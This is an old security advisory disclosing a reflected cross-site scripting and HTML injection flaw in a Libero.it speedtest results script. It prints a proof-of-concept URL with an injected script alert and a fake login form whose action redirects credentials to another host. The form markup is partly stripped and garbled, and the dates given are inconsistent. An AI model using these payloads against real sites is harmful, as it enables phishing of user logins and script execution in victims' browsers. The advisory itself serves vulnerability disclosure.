--Security Report--
Advisory: libero.it XSS vulnerability - HTML injection
---
Author: Davide Denicolo
---
Date: 28/04/06 
---
Contact: davidesecurityinfos.com
---
Vendor: ItaliaOnLine S.r.l (http://www.libero.it) 
Service: Web
Level: Low
---
Description:

Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service  called "Libero speedtest" is a simple "Bandwidth Speed
Test";
A java applet test, send Bandwidth information to perl script
(print_result_spt.pl) in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;

this is a normal HTTP URL:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5 
3&tdown=18875&tup=74297&size 48.0&t=0

this is a XSS URL:

http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up= 
ipt>alert('ciao')&tdown=3455&tup=5107&size 48.0&t=0



and this is an HTML form :

action="http://127.0.0.1">

 
		

			

				
			
			

				
					@libero.itvalue="1">@libero.it 
					@inwind.itvalue="2">@inwind.it 
@iol.itvalue="4">@iol.it 
@blu.itvalue="66">@blu.it 
				
			
		
		

			

				
			
			

				

				src="http://www.libero.it/i05/entra_hp.gif" alt="Entra" 
border="0" height="22" type="image" width="44">
				
			
		
	


and this is previous form injects in the request:

http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up= 
le%20border="0"%20width="32%"> 
.1">@libero.it@inwind">ize:8pt">@libero.it@inwind. 
@iol.it@blu.it">it@iol.it@blu.it< 
/option>name="T3"%20style="font-size:7pt">
 
lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44">
<
/tr>&tdown=3455&tup=5107&size 48.0&t=0
-- 

Timeline:
* 2/05/2006: Vulnerability found.
* 2/05/2006: Unable to contact vendor
-- 

For more information, please send question to: davidesecutityinfos.com